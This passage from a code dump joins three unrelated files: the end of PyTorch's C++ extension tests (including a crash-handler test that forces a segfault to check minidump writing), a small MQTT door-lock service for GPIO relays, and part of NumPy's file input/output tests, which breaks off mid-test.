@unittest.skipIf(not (TEST_CUDA or TEST_ROCM), "CUDA not found")
def test_half_support(self):
"""
Checks for an issue with operator< ambiguity for half when certain
THC headers are included.
See https://github.com/pytorch/pytorch/pull/10301#issuecomment-416773333
for the corresponding issue.
"""
cuda_source = """
template<typename T, typename U>
__global__ void half_test_kernel(const T* input, U* output) {
if (input[0] < input[1] || input[0] >= input[1]) {
output[0] = 123;
}
}
torch::Tensor half_test(torch::Tensor input) {
auto output = torch::empty(1, input.options().dtype(torch::kFloat));
AT_DISPATCH_FLOATING_TYPES_AND_HALF(input.scalar_type(), "half_test", [&] {
half_test_kernel<scalar_t><<<1, 1>>>(
input.data<scalar_t>(),
output.data<float>());
});
return output;
}
"""
module = torch.utils.cpp_extension.load_inline(
name="half_test_extension",
cpp_sources="torch::Tensor half_test(torch::Tensor input);",
cuda_sources=cuda_source,
functions=["half_test"],
verbose=True,
)
x = torch.randn(3, device="cuda", dtype=torch.half)
result = module.half_test(x)
self.assertEqual(result[0], 123)
def test_reload_jit_extension(self):
def compile(code):
return torch.utils.cpp_extension.load_inline(
name="reloaded_jit_extension",
cpp_sources=code,
functions="f",
verbose=True,
)
module = compile("int f() { return 123; }")
self.assertEqual(module.f(), 123)
module = compile("int f() { return 456; }")
self.assertEqual(module.f(), 456)
module = compile("int f() { return 456; }")
self.assertEqual(module.f(), 456)
module = compile("int f() { return 789; }")
self.assertEqual(module.f(), 789)
def test_cpp_frontend_module_has_same_output_as_python(self, dtype=torch.double):
extension = torch.utils.cpp_extension.load(
name="cpp_frontend_extension",
sources="cpp_extensions/cpp_frontend_extension.cpp",
verbose=True,
)
input = torch.randn(2, 5, dtype=dtype)
cpp_linear = extension.Net(5, 2)
cpp_linear.to(dtype)
python_linear = torch.nn.Linear(5, 2).to(dtype)
# First make sure they have the same parameters
cpp_parameters = dict(cpp_linear.named_parameters())
with torch.no_grad():
python_linear.weight.copy_(cpp_parameters["fc.weight"])
python_linear.bias.copy_(cpp_parameters["fc.bias"])
cpp_output = cpp_linear.forward(input)
python_output = python_linear(input)
self.assertEqual(cpp_output, python_output)
cpp_output.sum().backward()
python_output.sum().backward()
for p in cpp_linear.parameters():
self.assertFalse(p.grad is None)
self.assertEqual(cpp_parameters["fc.weight"].grad, python_linear.weight.grad)
self.assertEqual(cpp_parameters["fc.bias"].grad, python_linear.bias.grad)
def test_cpp_frontend_module_python_inter_op(self):
extension = torch.utils.cpp_extension.load(
name="cpp_frontend_extension",
sources="cpp_extensions/cpp_frontend_extension.cpp",
verbose=True,
)
# Create a torch.nn.Module which uses the C++ module as a submodule.
class M(torch.nn.Module):
def __init__(self):
super(M, self).__init__()
self.x = torch.nn.Parameter(torch.tensor(1.0))
self.net = extension.Net(3, 5)
def forward(self, input):
return self.net.forward(input) + self.x
net = extension.Net(5, 2)
net.double()
net.to(torch.get_default_dtype())
self.assertEqual(str(net), "Net")
# Further embed the torch.nn.Module into a Sequential, and also add the
# C++ module as an element of the Sequential.
sequential = torch.nn.Sequential(M(), torch.nn.Tanh(), net, torch.nn.Sigmoid())
input = torch.randn(2, 3)
# Try calling the module!
output = sequential.forward(input)
# The call operator is bound to forward too.
self.assertEqual(output, sequential(input))
self.assertEqual(list(output.shape), [2, 2])
# Do changes on the module hierarchy.
old_dtype = torch.get_default_dtype()
sequential.to(torch.float64)
sequential.to(torch.float32)
sequential.to(old_dtype)
self.assertEqual(sequential[2].parameters()[0].dtype, old_dtype)
# Make sure we can access these methods recursively.
self.assertEqual(len(list(sequential.parameters())), len(net.parameters()) * 2 + 1)
self.assertEqual(len(list(sequential.named_parameters())), len(net.named_parameters()) * 2 + 1)
self.assertEqual(len(list(sequential.buffers())), len(net.buffers()) * 2)
self.assertEqual(len(list(sequential.modules())), 8)
# Test clone()
net2 = net.clone()
self.assertEqual(len(net.parameters()), len(net2.parameters()))
self.assertEqual(len(net.buffers()), len(net2.buffers()))
self.assertEqual(len(net.modules()), len(net2.modules()))
# Try differentiating through the whole module.
for parameter in net.parameters():
self.assertIsNone(parameter.grad)
output.sum().backward()
for parameter in net.parameters():
self.assertFalse(parameter.grad is None)
self.assertGreater(parameter.grad.sum(), 0)
# Try calling zero_grad()
net.zero_grad()
for p in net.parameters():
self.assertEqual(p.grad, torch.zeros_like(p))
# Test train(), eval(), training (a property)
self.assertTrue(net.training)
net.eval()
self.assertFalse(net.training)
net.train()
self.assertTrue(net.training)
net.eval()
# Try calling the additional methods we registered.
biased_input = torch.randn(4, 5)
output_before = net.forward(biased_input)
bias = net.get_bias().clone()
self.assertEqual(list(bias.shape), [2])
net.set_bias(bias + 1)
self.assertEqual(net.get_bias(), bias + 1)
output_after = net.forward(biased_input)
self.assertNotEqual(output_before, output_after)
# Try accessing parameters
self.assertEqual(len(net.parameters()), 2)
np = net.named_parameters()
self.assertEqual(len(np), 2)
self.assertIn("fc.weight", np)
self.assertIn("fc.bias", np)
self.assertEqual(len(net.buffers()), 1)
nb = net.named_buffers()
self.assertEqual(len(nb), 1)
self.assertIn("buf", nb)
self.assertEqual(nb[0][1], torch.eye(5))
def test_cpp_frontend_module_has_up_to_date_attributes(self):
extension = torch.utils.cpp_extension.load(
name="cpp_frontend_extension",
sources="cpp_extensions/cpp_frontend_extension.cpp",
verbose=True,
)
net = extension.Net(5, 2)
self.assertEqual(len(net._parameters), 0)
net.add_new_parameter("foo", torch.eye(5))
self.assertEqual(len(net._parameters), 1)
self.assertEqual(len(net._buffers), 1)
net.add_new_buffer("bar", torch.eye(5))
self.assertEqual(len(net._buffers), 2)
self.assertEqual(len(net._modules), 1)
net.add_new_submodule("fc2")
self.assertEqual(len(net._modules), 2)
@unittest.skipIf(not (TEST_CUDA or TEST_ROCM), "CUDA not found")
def test_cpp_frontend_module_python_inter_op_with_cuda(self):
extension = torch.utils.cpp_extension.load(
name="cpp_frontend_extension",
sources="cpp_extensions/cpp_frontend_extension.cpp",
verbose=True,
)
net = extension.Net(5, 2)
for p in net.parameters():
self.assertTrue(p.device.type == "cpu")
cpu_parameters = [p.clone() for p in net.parameters()]
device = torch.device("cuda", 0)
net.to(device)
for i, p in enumerate(net.parameters()):
self.assertTrue(p.device.type == "cuda")
self.assertTrue(p.device.index == 0)
self.assertEqual(cpu_parameters[i], p)
net.cpu()
net.add_new_parameter("a", torch.eye(5))
net.add_new_parameter("b", torch.eye(5))
net.add_new_buffer("c", torch.eye(5))
net.add_new_buffer("d", torch.eye(5))
net.add_new_submodule("fc2")
net.add_new_submodule("fc3")
for p in net.parameters():
self.assertTrue(p.device.type == "cpu")
net.cuda()
for p in net.parameters():
self.assertTrue(p.device.type == "cuda")
def test_returns_shared_library_path_when_is_python_module_is_true(self):
source = """
#include <torch/script.h>
torch::Tensor func(torch::Tensor x) { return x; }
static torch::RegisterOperators r("test::func", &func);
"""
torch.utils.cpp_extension.load_inline(
name="is_python_module",
cpp_sources=source,
functions="func",
verbose=True,
is_python_module=False,
)
self.assertEqual(torch.ops.test.func(torch.eye(5)), torch.eye(5))
def test_set_default_type_also_changes_aten_default_type(self):
module = torch.utils.cpp_extension.load_inline(
name="test_set_default_type",
cpp_sources="torch::Tensor get() { return torch::empty({}); }",
functions="get",
verbose=True,
)
initial_default = torch.get_default_dtype()
try:
self.assertEqual(module.get().dtype, initial_default)
torch.set_default_dtype(torch.float64)
self.assertEqual(module.get().dtype, torch.float64)
torch.set_default_dtype(torch.float32)
self.assertEqual(module.get().dtype, torch.float32)
torch.set_default_dtype(torch.float16)
self.assertEqual(module.get().dtype, torch.float16)
finally:
torch.set_default_dtype(initial_default)
def test_compilation_error_formatting(self):
# Test that the missing-semicolon error message has linebreaks in it.
# This'll fail if the message has been munged into a single line.
# It's hard to write anything more specific as every compiler has it's own
# error formatting.
with self.assertRaises(RuntimeError) as e:
torch.utils.cpp_extension.load_inline(
name="test_compilation_error_formatting",
cpp_sources="int main() { return 0 }")
pattern = r'.*(\\n|\\r).*'
self.assertNotRegex(str(e), pattern)
def test_warning(self):
# Note: the module created from this source will include the py::key_error
# symbol. But because of visibility and the fact that it lives in a
# different compilation unit than pybind, this trips up ubsan even though
# it is fine. "ubsan.supp" thus needs to contain "vptr:warn_mod.so".
source = '''
// error_type:
// 0: no error
// 1: torch::TypeError
// 2: python_error()
// 3: py::error_already_set
at::Tensor foo(at::Tensor x, int error_type) {
std::ostringstream err_stream;
err_stream << "Error with " << x.type();
TORCH_WARN(err_stream.str());
if(error_type == 1) {
throw torch::TypeError(err_stream.str().c_str());
}
if(error_type == 2) {
PyObject* obj = PyTuple_New(-1);
TORCH_CHECK(!obj);
// Pretend it was caught in a different thread and restored here
auto e = python_error();
e.persist();
e.restore();
throw e;
}
if(error_type == 3) {
throw py::key_error(err_stream.str());
}
return x.cos();
}
'''
# Ensure double type for hard-coded c name below
t = torch.rand(2).double()
cpp_tensor_name = r"CPUDoubleType"
# Without error handling, the warnings cannot be catched
warn_mod = torch.utils.cpp_extension.load_inline(name='warn_mod',
cpp_sources=[source],
functions=['foo'],
with_pytorch_error_handling=False)
with warnings.catch_warnings(record=True) as w:
warn_mod.foo(t, 0)
self.assertEqual(len(w), 0)
with self.assertRaisesRegex(TypeError, t.type()):
warn_mod.foo(t, 1)
self.assertEqual(len(w), 0)
with self.assertRaisesRegex(SystemError, "bad argument to internal function"):
warn_mod.foo(t, 2)
self.assertEqual(len(w), 0)
with self.assertRaisesRegex(KeyError, cpp_tensor_name):
warn_mod.foo(t, 3)
self.assertEqual(len(w), 0)
warn_mod = torch.utils.cpp_extension.load_inline(name='warn_mod',
cpp_sources=[source],
functions=['foo'],
with_pytorch_error_handling=True)
with warnings.catch_warnings(record=True) as w:
# Catched with no error should be detected
warn_mod.foo(t, 0)
self.assertEqual(len(w), 1)
# Catched with cpp error should also be detected
with self.assertRaisesRegex(TypeError, t.type()):
warn_mod.foo(t, 1)
self.assertEqual(len(w), 2)
# Catched with python error should also be detected
with self.assertRaisesRegex(SystemError, "bad argument to internal function"):
warn_mod.foo(t, 2)
self.assertEqual(len(w), 3)
# Catched with pybind error should also be detected
# Note that there is no type name translation for pybind errors
with self.assertRaisesRegex(KeyError, cpp_tensor_name):
warn_mod.foo(t, 3)
self.assertEqual(len(w), 4)
# Make sure raising warnings are handled properly
with warnings.catch_warnings(record=True) as w:
warnings.simplefilter("error")
# No error, the warning should raise
with self.assertRaisesRegex(UserWarning, t.type()):
warn_mod.foo(t, 0)
self.assertEqual(len(w), 0)
# Another error happened, the warning is ignored
with self.assertRaisesRegex(TypeError, t.type()):
warn_mod.foo(t, 1)
self.assertEqual(len(w), 0)
def test_autograd_from_cpp(self):
source = '''
void run_back(at::Tensor x) {
x.backward({});
}
void run_back_no_gil(at::Tensor x) {
pybind11::gil_scoped_release no_gil;
x.backward({});
}
'''
class MyFn(torch.autograd.Function):
@staticmethod
def forward(ctx, x):
return x.clone()
@staticmethod
def backward(ctx, gx):
return gx
test_backward_deadlock = torch.utils.cpp_extension.load_inline(name='test_backward_deadlock',
cpp_sources=[source],
functions=['run_back', 'run_back_no_gil'],)
# This used to deadlock
inp = torch.rand(20, requires_grad=True)
loss = MyFn.apply(inp).sum()
with self.assertRaisesRegex(RuntimeError, "The autograd engine was called while holding the GIL."):
test_backward_deadlock.run_back(loss)
inp = torch.rand(20, requires_grad=True)
loss = MyFn.apply(inp).sum()
test_backward_deadlock.run_back_no_gil(loss)
def test_custom_compound_op_autograd(self):
# Test that a custom compound op (i.e. a custom op that just calls other aten ops)
# correctly returns gradients of those other ops
source = """
#include <torch/library.h>
torch::Tensor my_add(torch::Tensor x, torch::Tensor y) {
return x + y;
}
TORCH_LIBRARY(my, m) {
m.def("add", &my_add);
}
"""
torch.utils.cpp_extension.load_inline(
name="is_python_module",
cpp_sources=source,
verbose=True,
is_python_module=False,
)
a = torch.randn(5, 5, requires_grad=True)
b = torch.randn(5, 5, requires_grad=True)
gradcheck(torch.ops.my.add, [a, b], eps=1e-2)
@staticmethod
def _crash_handler_test_process(stderr_file, destination):
# Code to enable dumps and trigger a segfault
if sys.platform == "win32":
destination = destination.replace("\\", "\\\\")
csrc = textwrap.dedent(f"""
#include <torch/torch.h>
#include <locale>
#include <iostream>
#include <codecvt>
#include <string>
int fail() {{
std::wstring_convert<std::codecvt_utf8_utf16<wchar_t>> converter;
std::string narrow("{destination}");
std::wstring wide = converter.from_bytes(narrow);
torch::crash_handler::enable_minidumps(wide.c_str());
volatile int* bad = nullptr;
return *bad;
}}
""")
else:
csrc = textwrap.dedent(f"""
#include <torch/torch.h>
int fail() {{
torch::crash_handler::enable_minidumps("{destination}");
volatile int* bad = nullptr;
return *bad;
}}
""")
# Some special stuff to overwrite stderr for a C++ extension
# Copied from: https://stackoverflow.com/questions/8804893/redirect-stdout-from-python-for-c-calls
sys.stdout.flush()
newstdout = os.dup(2)
devnull = os.open(stderr_file, os.O_WRONLY)
os.dup2(devnull, 2)
os.close(devnull)
sys.stdout = os.fdopen(newstdout, 'w')
module = torch.utils.cpp_extension.load_inline(
name="segfault",
cpp_sources=csrc,
functions=["fail"],
)
module.fail()
@unittest.skipIf(TEST_WITH_ASAN, "ASAN disables the crash handler's signal handler")
@unittest.skipIf(not has_breakpad(), "Built without breakpad")
@unittest.skipIf(os.environ.get("TEST_CONFIG") == "force_on_cpu", "fails on force_on_cpu config, tracked w/ #65253")
def test_crash_handler(self):
with tempfile.TemporaryDirectory() as temp_dir, tempfile.NamedTemporaryFile(delete=not sys.platform == "win32") as stderr:
# Use multiprocessing to spin up a separate process to make catching
# the segfault easier
p = Process(target=self._crash_handler_test_process, args=(stderr.name, temp_dir))
p.start()
p.join()
with open(stderr.name) as f:
result = f.read().strip()
# Check that the signal handler was called
self.assertTrue(result.startswith(f"Wrote minidump to {temp_dir}"))
with open(result.replace("Wrote minidump to ", ""), "rb") as dump_file:
dump_bytes = dump_file.read()
# Check that the file has the correct magic number
self.assertEqual(b"MDMP", dump_bytes[0:4])
if __name__ == "__main__":
common.run_tests()
|
door.py
|
"""Database module."""
from os import environ
from contextlib import contextmanager, AbstractContextManager
from typing import Callable
import logging
from threading import Thread
from time import sleep
from const import(
COMMAND_PAYLOAD
,STATUS_PAYLOAD
)
build_type = environ.get('BUILD_TYPE', None)
print(f"build_type: {build_type}")
if build_type == 'release':
import gpiozero
from models import Door
else:
from models import DoorDummy as Door
logger = logging.getLogger(__name__)
class DoorService:
doors = []
mqttc = None
def __init__(self, doors_cfg: dict) -> None:
print(f"doors_cfg: {doors_cfg}")
for door, cfg in doors_cfg.items():
print(f"new_door: {door}")
if build_type == 'release':
new_door = Door(name=door, command_topic=cfg['command_topic'], state_topic=cfg['state_topic'], relay=gpiozero.OutputDevice(cfg['pin'], active_high=False, initial_value=False))
else:
new_door = Door(name=door, command_topic=cfg['command_topic'], state_topic=cfg['state_topic'], pin=cfg['pin'])
# new_door.set_relay()
self.doors.append(new_door)
self.update_status()
self.status_thread = Thread(target=self.publish_status_cyclic, daemon=True)
self.status_thread.start()
def update_status(self):
for door in self.doors:
door.update_status()
def set_mqttc(self, mqttc):
self.mqttc = mqttc
def subscribe(self):
print(f"subscribing to topics!!!!")
for door in self.doors:
print(f"subscribing to topic: {door.command_topic}")
self.mqttc.subscribe(door.command_topic, qos=0)
def publish_status(self):
for door in self.doors:
if door.state != "Unknown":
self.mqttc.publish(door.state_topic, payload=door.state)
def mqtt_on_message(self, topic, payload):
print("Doormanager message: ", topic, payload)
for door in self.doors:
if topic == door.command_topic:
if payload == COMMAND_PAYLOAD.LOCK:
print(f"Doormanager message: Locking door {door}")
door.lock()
elif payload == COMMAND_PAYLOAD.UNLOCK:
print(f"Doormanager message: Unlocking door {door}")
door.unlock()
self.publish_status()
def publish_status_cyclic(self):
if self.mqttc is not None:
self.publish_status()
sleep(300)
|
test_io.py
|
import numpy as np
import numpy.ma as ma
from numpy.ma.testutils import *
from numpy.testing import assert_warns
import sys
import gzip
import os
import threading
from tempfile import mkstemp, NamedTemporaryFile
import time
from datetime import datetime
from numpy.lib._iotools import ConverterError, ConverterLockError, \
ConversionWarning
from numpy.compat import asbytes, asbytes_nested, bytes
if sys.version_info[0] >= 3:
from io import BytesIO
def StringIO(s=""):
return BytesIO(asbytes(s))
else:
from StringIO import StringIO
BytesIO = StringIO
MAJVER, MINVER = sys.version_info[:2]
def strptime(s, fmt=None):
"""This function is available in the datetime module only
from Python >= 2.5.
"""
if sys.version_info[0] >= 3:
return datetime(*time.strptime(s.decode('latin1'), fmt)[:3])
else:
return datetime(*time.strptime(s, fmt)[:3])
class RoundtripTest(object):
def roundtrip(self, save_func, *args, **kwargs):
"""
save_func : callable
Function used to save arrays to file.
file_on_disk : bool
If true, store the file on disk, instead of in a
string buffer.
save_kwds : dict
Parameters passed to `save_func`.
load_kwds : dict
Parameters passed to `numpy.load`.
args : tuple of arrays
Arrays stored to file.
"""
save_kwds = kwargs.get('save_kwds', {})
load_kwds = kwargs.get('load_kwds', {})
file_on_disk = kwargs.get('file_on_disk', False)
if file_on_disk:
# Do not delete the file on windows, because we can't
# reopen an already opened file on that platform, so we
# need to close the file and reopen it, implying no
# automatic deletion.
if sys.platform == 'win32' and MAJVER >= 2 and MINVER >= 6:
target_file = NamedTemporaryFile(delete=False)
else:
target_file = NamedTemporaryFile()
load_file = target_file.name
else:
target_file = StringIO()
load_file = target_file
arr = args
save_func(target_file, *arr, **save_kwds)
target_file.flush()
target_file.seek(0)
if sys.platform == 'win32' and not isinstance(target_file, BytesIO):
target_file.close()
arr_reloaded = np.load(load_file, **load_kwds)
self.arr = arr
self.arr_reloaded = arr_reloaded
def test_array(self):
a = np.array([[1, 2], [3, 4]], float)
self.roundtrip(a)
a = np.array([[1, 2], [3, 4]], int)
self.roundtrip(a)
a = np.array([[1 + 5j, 2 + 6j], [3 + 7j, 4 + 8j]], dtype=np.csingle)
self.roundtrip(a)
a = np.array([[1 + 5j, 2 + 6j], [3 + 7j, 4 + 8j]], dtype=np.cdouble)
self.roundtrip(a)
def test_1D(self):
a = np.array([1, 2, 3, 4], int)
self.roundtrip(a)
@np.testing.dec.knownfailureif(sys.platform == 'win32', "Fail on Win32")
def test_mmap(self):
a = np.array([[1, 2.5], [4, 7.3]])
self.roundtrip(a, file_on_disk=True, load_kwds={'mmap_mode': 'r'})
def test_record(self):
a = np.array([(1, 2), (3, 4)], dtype=[('x', 'i4'), ('y', 'i4')])
self.roundtrip(a)
class TestSaveLoad(RoundtripTest, TestCase):
def roundtrip(self, *args, **kwargs):
RoundtripTest.roundtrip(self, np.save, *args, **kwargs)
assert_equal(self.arr[0], self.arr_reloaded)
class TestSavezLoad(RoundtripTest, TestCase):
def roundtrip(self, *args, **kwargs):
RoundtripTest.roundtrip(self, np.savez, *args, **kwargs)
for n, arr in enumerate(self.arr):
assert_equal(arr, self.arr_reloaded['arr_%d' % n])
def test_multiple_arrays(self):
a = np.array([[1, 2], [3, 4]], float)
b = np.array([[1 + 2j, 2 + 7j], [3 - 6j, 4 + 12j]], complex)
self.roundtrip(a, b)
def test_named_arrays(self):
a = np.array([[1, 2], [3, 4]], float)
b = np.array([[1 + 2j, 2 + 7j], [3 - 6j, 4 + 12j]], complex)
c = StringIO()
np.savez(c, file_a=a, file_b=b)
c.seek(0)
l = np.load(c)
assert_equal(a, l['file_a'])
assert_equal(b, l['file_b'])
def test_savez_filename_clashes(self):
# Test that issue #852 is fixed
# and savez functions in multithreaded environment
def writer(error_list):
fd, tmp = mkstemp(suffix='.npz')
os.close(fd)
try:
arr = np.random.randn(500, 500)
try:
np.savez(tmp, arr=arr)
except OSError, err:
error_list.append(err)
finally:
os.remove(tmp)
errors = []
threads = [threading.Thread(target=writer, args=(errors,))
for j in xrange(3)]
for t in threads:
t.start()
for t in threads:
t.join()
if errors:
raise AssertionError(errors)
class TestSaveTxt(TestCase):
def test_array(self):
a = np.array([[1, 2], [3, 4]], float)
fmt = "%.18e"
c = StringIO()
np.savetxt(c, a, fmt=fmt)
c.seek(0)
assert_equal(c.readlines(),
asbytes_nested(
[(fmt + ' ' + fmt + '\n') % (1, 2),
(fmt + ' ' + fmt + '\n') % (3, 4)]))
a = np.array([[1, 2], [3, 4]], int)
c = StringIO()
np.savetxt(c, a, fmt='%d')
c.seek(0)
assert_equal(c.readlines(), asbytes_nested(['1 2\n', '3 4\n']))
def test_1D(self):
a = np.array([1, 2, 3, 4], int)
c = StringIO()
np.savetxt(c, a, fmt='%d')
c.seek(0)
lines = c.readlines()
assert_equal(lines, asbytes_nested(['1\n', '2\n', '3\n', '4\n']))
def test_record(self):
a = np.array([(1, 2), (3, 4)], dtype=[('x', 'i4'), ('y', 'i4')])
c = StringIO()
np.savetxt(c, a, fmt='%d')
c.seek(0)
assert_equal(c.readlines(), asbytes_nested(['1 2\n', '3 4\n']))
def test_delimiter(self):
a = np.array([[1., 2.], [3., 4.]])
c = StringIO()
np.savetxt(c, a, delimiter=asbytes(','), fmt='%d')
c.seek(0)
assert_equal(c.readlines(), asbytes_nested(['1,2\n', '3,4\n']))
def test_format(self):
a = np.array([(1, 2), (3, 4)])
c = StringIO()
# Sequence of formats
np.savetxt(c, a, fmt=['%02d', '%3.1f'])
c.seek(0)
assert_equal(c.readlines(), asbytes_nested(['01 2.0\n', '03 4.0\n']))
# A single multiformat string
c = StringIO()
np.savetxt(c, a, fmt='%02d : %3.1f')
c.seek(0)
lines = c.readlines()
assert_equal(lines, asbytes_nested(['01 : 2.0\n', '03 : 4.0\n']))
# Specify delimiter, should be overiden
c = StringIO()
np.savetxt(c, a, fmt='%02d : %3.1f', delimiter=',')
c.seek(0)
lines = c.readlines()
assert_equal(lines, asbytes_nested(['01 : 2.0\n', '03 : 4.0\n']))
def test_file_roundtrip(self):
f, name = mkstemp()
os.close(f)
try:
a = np.array([(1, 2), (3, 4)])
np.savetxt(name, a)
b = np.loadtxt(name)
assert_array_equal(a, b)
finally:
os.unlink(name)
class TestLoadTxt(TestCase):
def test_record(self):
c = StringIO()
c.write(asbytes('1 2\n3 4'))
c.seek(0)
x = np.loadtxt(c, dtype=[('x', np.int32), ('y', np.int32)])
a = np.array([(1, 2), (3, 4)], dtype=[('x', 'i4'), ('y', 'i4')])
assert_array_equal(x, a)
d = StringIO()
d.write(asbytes('M 64.0 75.0\nF 25.0 60.0'))
d.seek(0)
mydescriptor = {'names': ('gender', 'age', 'weight'),
'formats': ('S1',
'i4', 'f4')}
b = np.array([('M', 64.0, 75.0),
('F', 25.0, 60.0)], dtype=mydescriptor)
y = np.loadtxt(d, dtype=mydescriptor)
assert_array_equal(y, b)
def test_array(self):
c = StringIO()
c.write(asbytes('1 2\n3 4'))
c.seek(0)
x = np.loadtxt(c, dtype=int)
a = np.array([[1, 2], [3, 4]], int)
assert_array_equal(x, a)
c.seek(0)
x = np.loadtxt(c, dtype=float)
a = np.array([[1, 2], [3, 4]], float)
assert_array_equal(x, a)
def test_1D(self):
c = StringIO()
c.write(asbytes('1\n2\n3\n4\n'))
c.seek(0)
x = np.loadtxt(c, dtype=int)
a = np.array([1, 2, 3, 4], int)
assert_array_equal(x, a)
c = StringIO()
c.write(asbytes('1,2,3,4\n'))
c.seek(0)
x = np.loadtxt(c, dtype=int, delimiter=',')
a = np.array([1, 2, 3, 4], int)
assert_array_equal(x, a)
def test_missing(self):
c = StringIO()
c.write(asbytes('1,2,3,,5\n'))
c.seek(0)
x = np.loadtxt(c, dtype=int, delimiter=',', \
converters={3:lambda s: int(s or - 999)})
a = np.array([1, 2, 3, -999, 5], int)
assert_array_equal(x, a)
def test_converters_with_usecols(self):
c = StringIO()
c.write(asbytes('1,2,3,,5\n6,7,8,9,10\n'))
c.seek(0)
x = np.loadtxt(c, dtype=int, delimiter=',', \
converters={3:lambda s: int(s or - 999)}, \
usecols=(1, 3,))
a = np.array([[2, -999], [7, 9]], int)
assert_array_equal(x, a)
def test_comments(self):
c = StringIO()
c.write(asbytes('# comment\n1,2,3,5\n'))
c.seek(0)
x = np.loadtxt(c, dtype=int, delimiter=',', \
comments='#')
a = np.array([1, 2, 3, 5], int)
assert_array_equal(x, a)
def test_skiprows(self):
c = StringIO()
c.write(asbytes('comment\n1,2,3,5\n'))
c.seek(0)
x = np.loadtxt(c, dtype=int, delimiter=',', \
skiprows=1)
a = np.array([1, 2, 3, 5], int)
assert_array_equal(x, a)
c = StringIO()
c.write(asbytes('# comment\n1,2,3,5\n'))
c.seek(0)
x = np.loadtxt(c, dtype=int, delimiter=',', \
skiprows=1)
a = np.array([1, 2, 3, 5], int)
assert_array_equal(x, a)
def test_usecols(self):
a = np.array([[1, 2], [3, 4]], float)
c = StringIO()
np.savetxt(c, a)
c.seek(0)
x = np.loadtxt(c, dtype=float, usecols=(1,))
assert_array_equal(x, a[:, 1])
a = np.array([[1, 2, 3], [3, 4, 5]], float)
c = StringIO()
np.savetxt(c, a)
c.seek(0)
x = np.loadtxt(c, dtype=float, usecols=(1, 2))
assert_array_equal(x, a[:, 1:])
# Testing with arrays instead of tuples.
c.seek(0)
x = np.loadtxt(c, dtype=float, usecols=np.array([1, 2]))
assert_array_equal(x, a[:, 1:])
# Checking with dtypes defined converters.
data = '''JOE 70.1 25.3
BOB 60.5 27.9
'''
c = StringIO(data)
names = ['stid', 'temp']
dtypes = ['S4', 'f8']
arr = np.loadtxt(c, usecols=(0, 2), dtype=zip(names, dtypes))
assert_equal(arr['stid'], asbytes_nested(["JOE", "BOB"]))
assert_equal(arr['temp'], [25.3, 27.9])
def test_fancy_dtype(self):
c = StringIO()
c.write(asbytes('1,2,3.0\n4,5,6.0\n'))
c.seek(0)
dt = np.dtype([('x', int), ('y', [('t', int), ('s', float)])])
x = np.loadtxt(c, dtype=dt, delimiter=',')
a = np.array([(1, (2, 3.0)), (4, (5, 6.0))], dt)
assert_array_equal(x, a)
def test_shaped_dtype(self):
c = StringIO("aaaa 1.0 8.0 1 2 3 4 5 6")
dt = np.dtype([('name', 'S4'), ('x', float), ('y', float),
('block', int, (2, 3))])
x = np.loadtxt(c, dtype=dt)
a = np.array([('aaaa', 1.0, 8.0, [[1, 2, 3], [4, 5, 6]])],
dtype=dt)
assert_array_equal(x, a)
def test_3d_shaped_dtype(self):
c = StringIO("aaaa 1.0 8.0 1 2 3 4 5 6 7 8 9 10 11 12")
dt = np.dtype([('name', 'S4'), ('x', float), ('y', float),
('block', int, (2, 2, 3))])
x = np.loadtxt(c, dtype=dt)
a = np.array([('aaaa', 1.0, 8.0, [[[1, 2, 3], [4, 5, 6]],[[7, 8, 9], [10, 11, 12]]])],
dtype=dt)
assert_array_equal(x, a)
def test_empty_file(self):
c = StringIO()
assert_raises(IOError, np.loadtxt, c)
def test_unused_converter(self):
c = StringIO()
c.writelines([asbytes('1 21\n'), asbytes('3 42\n')])
c.seek(0)
data = np.loadtxt(c, usecols=(1,),
converters={0: lambda s: int(s, 16)})
assert_array_equal(data, [21, 42])
c.seek(0)
data = np.loadtxt(c, usecols=(1,),
converters={1: lambda s: int(s, 16)})
assert_array_equal(data, [33, 66])
def test_dtype_with_object(self):
"Test using an explicit dtype with an object"
from datetime import date
import time
data = """
1; 2001-01-01
2; 2002-01-31
"""
ndtype = [('idx', int), ('code', np.object)]
func = lambda s: strptime(s.strip(), "%Y-%m-%d")
converters = {1: func}
test = np.loadtxt(StringIO(data), delimiter=";", dtype=ndtype,
converters=converters)
control = np.array([(1, datetime(2001, 1, 1)), (2, datetime(2002, 1, 31))],
dtype=ndtype)
assert_equal(test, control)
def test_universal_newline(self):
f, name = mkstemp()
os.write(f, asbytes('1 21\r3 42\r'))
os.close(f)
try:
data = np.loadtxt(name)
assert_array_equal(data, [[1, 21], [3, 42]])
finally:
os.unlink(name)
class Testfromregex(TestCase):
def test_record(self):
c = StringIO()
c.write(asbytes('1.312 foo\n1.534 bar\n4.444 qux'))
c.seek(0)
dt = [('num', np.float64), ('val', 'S3')]
x = np.fromregex(c, r"([0-9.]+)\s+(...)", dt)
a = np.array([(1.312, 'foo'), (1.534, 'bar'), (4.444, 'qux')],
dtype=dt)
assert_array_equal(x, a)
def test_record_2(self):
c = StringIO()
c.write(asbytes('1312 foo\n1534 bar\n4444 qux'))
c.seek(0)
dt = [('num', np.int32), ('val', 'S3')]
x = np.fromregex(c, r"(\d+)\s+(...)", dt)
a = np.array([(1312, 'foo'), (1534, 'bar'), (4444, 'qux')],
dtype=dt)
assert_array_equal(x, a)
def test_record_3(self):
c = StringIO()
c.write(asbytes('1312 foo\n1534 bar\n4444 qux'))
c.seek(0)
dt = [('num', np.float64)]
x = np.fromregex(c, r"(\d+)\s+...", dt)
a = np.array([(1312,), (1534,), (4444,)], dtype=dt)
assert_array_equal(x, a)
#####--------------------------------------------------------------------------
class TestFromTxt(TestCase):
#
def test_record(self):
"Test w/ explicit dtype"
data = StringIO(asbytes('1 2\n3 4'))
# data.seek(0)
test = np.ndfromtxt(data, dtype=[('x', np.int32), ('y', np.int32)])
control = np.array([(1, 2), (3, 4)], dtype=[('x', 'i4'), ('y', 'i4')])
assert_equal(test, control)
#
data = StringIO('M 64.0 75.0\nF 25.0 60.0')
# data.seek(0)
descriptor = {'names': ('gender', 'age', 'weight'),
'formats': ('S1', 'i4', 'f4')}
control = np.array([('M', 64.0, 75.0), ('F', 25.0, 60.0)],
dtype=descriptor)
test = np.ndfromtxt(data, dtype=descriptor)
assert_equal(test, control)
def test_array(self):
"Test outputing a standard ndarray"
data = StringIO('1 2\n3 4')
control = np.array([[1, 2], [3, 4]], dtype=int)
test = np.ndfromtxt(data, dtype=int)
assert_array_equal(test, control)
#
data.seek(0)
control = np.array([[1, 2], [3, 4]], dtype=float)
test = np.loadtxt(data, dtype=float)
assert_array_equal(test, control)
def test_1D(self):
"Test squeezing to 1D"
control = np.array([1, 2, 3, 4], int)
